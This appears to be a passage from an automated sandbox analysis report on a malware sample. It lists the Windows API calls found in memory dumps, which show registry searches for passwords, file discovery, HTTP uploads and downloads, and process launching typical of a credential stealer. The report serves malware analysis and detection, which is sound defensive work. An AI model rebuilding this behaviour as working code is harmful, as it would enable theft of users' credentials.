                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                            • API String ID: 3532888709-1526165396
                                            • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                            • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                            • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                            • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                            APIs
                                              • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                              • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                              • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                              • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                            • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                            • StrCmpCA.SHLWAPI(?,02E26370), ref: 00406147
                                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                            • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                            • InternetCloseHandle.WININET(a+A), ref: 00406253
                                            • InternetCloseHandle.WININET(00000000), ref: 00406260
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                            • String ID: a+A$a+A
                                            • API String ID: 4287319946-2847607090
                                            • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                            • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                            • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                            • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • memset.MSVCRT ref: 03030E83
                                            • lstrcat.KERNEL32(?,00000000), ref: 03030E9C
                                            • lstrcat.KERNEL32(?,00420D7C), ref: 03030EAE
                                            • lstrcat.KERNEL32(?,00000000), ref: 03030EC4
                                            • lstrcat.KERNEL32(?,00420D80), ref: 03030ED6
                                            • lstrcat.KERNEL32(?,00000000), ref: 03030EEF
                                            • lstrcat.KERNEL32(?,00420D84), ref: 03030F01
                                            • lstrlen.KERNEL32(?), ref: 03030F0E
                                            • memset.MSVCRT ref: 03030F34
                                            • memset.MSVCRT ref: 03030F48
                                              • Part of subcall function 0303AA87: lstrlen.KERNEL32(0302516C,?,?,0302516C,00420DDE), ref: 0303AA92
                                              • Part of subcall function 0303AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0303AAEC
                                              • Part of subcall function 03038DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,03021660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 03038DED
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03039927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,03030DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 03039948
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 03030FC1
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03030FCD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                            • String ID:
                                            • API String ID: 1395395982-0
                                            • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                            • Instruction ID: c5f03bb3aef0106dbad217044de5fa7bf2a3bda1b7c443fcb18bc426d7d0ba8a
                                            • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                            • Instruction Fuzzy Hash: 6B81C8B96113186BCB14EBA0DD51FED733DAF86305F004199A3466A091EF746B88CF59
                                            APIs
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • memset.MSVCRT ref: 03030E83
                                            • lstrcat.KERNEL32(?,00000000), ref: 03030E9C
                                            • lstrcat.KERNEL32(?,00420D7C), ref: 03030EAE
                                            • lstrcat.KERNEL32(?,00000000), ref: 03030EC4
                                            • lstrcat.KERNEL32(?,00420D80), ref: 03030ED6
                                            • lstrcat.KERNEL32(?,00000000), ref: 03030EEF
                                            • lstrcat.KERNEL32(?,00420D84), ref: 03030F01
                                            • lstrlen.KERNEL32(?), ref: 03030F0E
                                            • memset.MSVCRT ref: 03030F34
                                            • memset.MSVCRT ref: 03030F48
                                              • Part of subcall function 0303AA87: lstrlen.KERNEL32(0302516C,?,?,0302516C,00420DDE), ref: 0303AA92
                                              • Part of subcall function 0303AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0303AAEC
                                              • Part of subcall function 03038DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,03021660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 03038DED
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03039927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,03030DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 03039948
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 03030FC1
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 03030FCD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                            • String ID:
                                            • API String ID: 1395395982-0
                                            • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                            • Instruction ID: bd6dff80c942f1e2fb71453a9da9804800f9ef25bb90d59747969f9235f6ff0d
                                            • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                            • Instruction Fuzzy Hash: 3A61D7B9611318ABCB14EBA0CD45FED773CAF86305F004199E7466A091EF746B88CF59
                                            APIs
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A51
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A68
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A7F
                                              • Part of subcall function 03024A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03024AA0
                                              • Part of subcall function 03024A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 03024AB0
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 03024B7C
                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 03024BA1
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03024D21
                                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 0302504F
                                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0302506B
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 0302507F
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 030250B0
                                            • InternetCloseHandle.WININET(00000000), ref: 03025114
                                            • InternetCloseHandle.WININET(00000000), ref: 0302512C
                                            • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 03024D7C
                                              • Part of subcall function 0303AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 0303AC2C
                                              • Part of subcall function 0303AC17: lstrcpy.KERNEL32(00000000), ref: 0303AC6B
                                              • Part of subcall function 0303AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0303AC79
                                              • Part of subcall function 0303AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0303AB6C
                                              • Part of subcall function 0303AB87: lstrcpy.KERNEL32(00000000,?), ref: 0303ABD9
                                              • Part of subcall function 0303AB87: lstrcat.KERNEL32(00000000), ref: 0303ABE9
                                            • InternetCloseHandle.WININET(00000000), ref: 03025136
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                            • String ID:
                                            • API String ID: 2402878923-0
                                            • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                            • Instruction ID: e0ec645437dc5c04c75e1aec48095a6b9abe52e94df71a21579ebf94c08ed001
                                            • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                            • Instruction Fuzzy Hash: 67121E7AA12718ABCB14EB90DD90EEEB37DAF57300F544199A146670A1EF702F88CF51
                                            APIs
                                              • Part of subcall function 0303AA07: lstrcpy.KERNEL32(?,00000000), ref: 0303AA4D
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A51
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A68
                                              • Part of subcall function 03024A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 03024A7F
                                              • Part of subcall function 03024A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 03024AA0
                                              • Part of subcall function 03024A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 03024AB0
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 03026548
                                            • StrCmpCA.SHLWAPI(?,0064A480), ref: 0302656A
                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0302659C
                                            • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 030265EC
                                            • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 03026626
                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 03026638
                                            • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 03026664
                                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 030266D4
                                            • InternetCloseHandle.WININET(00000000), ref: 03026756
                                            • InternetCloseHandle.WININET(00000000), ref: 03026760
                                            • InternetCloseHandle.WININET(00000000), ref: 0302676A
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                            • String ID:
                                            • API String ID: 3074848878-0
                                            • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                            • Instruction ID: 1ab15db1c0d3ca8500b515d48f92e7affeeb0378b1f88aa58630e587d5fff0c1
                                            • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                            • Instruction Fuzzy Hash: 8D716075A41328EBDB24DFA0DC48FEEB7B9FB45700F104199E50A6B190DBB56A84CF41
                                            APIs
                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 030392D3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateGlobalStream
                                            • String ID:
                                            • API String ID: 2244384528-0
                                            • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                            • Instruction ID: 3ad1c81ab6e1d7532ca7b9daa1ab71432fe9b429a77cfaac351728a763fd37e9
                                            • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                            • Instruction Fuzzy Hash: 6B71FDB9A40208ABDB14DFE4DC84FEEBBB9FF49300F108508F515AB290DB74A905CB61
                                            APIs
                                            • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                            • memset.MSVCRT ref: 0041716A
                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                            Strings
                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                            • sA, xrefs: 00417111
                                            • sA, xrefs: 004172AE, 00417179, 0041717C
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: OpenProcesslstrcpymemset
                                            • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                            • API String ID: 224852652-2614523144
                                            • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                            • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                            • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                            • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                            APIs
                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 030377A9
                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 030377E6
                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0303786A
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 03037871
                                            • wsprintfA.USER32 ref: 030378A7
                                              • Part of subcall function 0303A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0303A9EF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                            • String ID: :$C$\$B
                                            • API String ID: 1544550907-183544611
                                            • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                            • Instruction ID: 3732a4898b22e7edb83e40795045098a69b9779405529bc79d705ea6a8db895d
                                            • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                            • Instruction Fuzzy Hash: 1E41AFB5D41248EFDB10DF94CC84BEEBBB9EF49700F004199F505AB280D7756A84CBA5
                                            APIs
                                              • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                              • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                              • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                              • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                              • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                              • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                            • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                            • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                            • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                            • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                            • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                            • task.LIBCPMTD ref: 004076FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                            • String ID: :
                                            • API String ID: 3191641157-3653984579
                                            • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                            • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                            • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                            • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                            APIs
                                            • lstrcpy.KERNEL32(?,?), ref: 03031642
                                              • Part of subcall function 03039047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 03039072
                                              • Part of subcall function 030394C7: StrStrA.SHLWAPI(?,?), ref: 030394D3
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0303167E
                                              • Part of subcall function 030394C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 030394F7
                                              • Part of subcall function 030394C7: lstrlen.KERNEL32(?), ref: 0303950E
                                              • Part of subcall function 030394C7: wsprintfA.USER32 ref: 0303952E
                                            • lstrcpy.KERNEL32(?,00000000), ref: 030316C6
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0303170E
                                            • lstrcpy.KERNEL32(?,00000000), ref: 03031755
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0303179D
                                            • lstrcpy.KERNEL32(?,00000000), ref: 030317E5
                                            • lstrcpy.KERNEL32(?,00000000), ref: 0303182C
                                            • lstrcpy.KERNEL32(?,00000000), ref: 03031874
                                              • Part of subcall function 0303AA87: lstrlen.KERNEL32(0302516C,?,?,0302516C,00420DDE), ref: 0303AA92
                                              • Part of subcall function 0303AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 0303AAEC
                                            • strtok_s.MSVCRT ref: 030319B7
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1601162206.0000000003020000.00000040.00001000.00020000.00000000.sdmp, Offset: 03020000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_3020000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcpy$lstrlen$FolderPathlstrcpynstrtok_swsprintf
                                            • String ID:
                                            • API String ID: 4276352425-0
                                            • Opcode ID: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                            • Instruction ID: b8d9a66b6a938063d0c197314db74a9b3fdf4e1b2c5e9787dca8bf3485dd78f5
                                            • Opcode Fuzzy Hash: 83c65cf866c105f8028d079524fd97563369a1785312c17678ae49576856bbd9
                                            • Instruction Fuzzy Hash: 757197BA942218ABCB14EBA0DC88EFE737DAF96300F044598E14DA6150EF755B84CF51
                                            APIs
                                            • memset.MSVCRT ref: 00407314
                                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                            • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                              • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                            • task.LIBCPMTD ref: 00407555
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.1599324639.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000006.00000002.1599324639.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000006.00000002.1599324639.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_400000_oqIz1tfl5h.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                            • String ID: Password
                                            • API String ID: 2698061284-3434357891
                                            • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                            • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                            • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                            • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                            APIs
                                            • lstrcatA.KERNEL32(?,02E28F20,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                            • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                            • lstrcatA.KERNEL32(?,?), ref: 00414820
                                            • lstrcatA.KERNEL32(?,?), ref: 00414834
                                            • lstrcatA.KERNEL32(?,02DF4258), ref: 00414847
                                            • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                            • lstrcatA.KERNEL32(?,02E297D8), ref: 0041486F
                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                              • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                              • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                              • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                              • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                            Strings
                                            Memory Dump Source
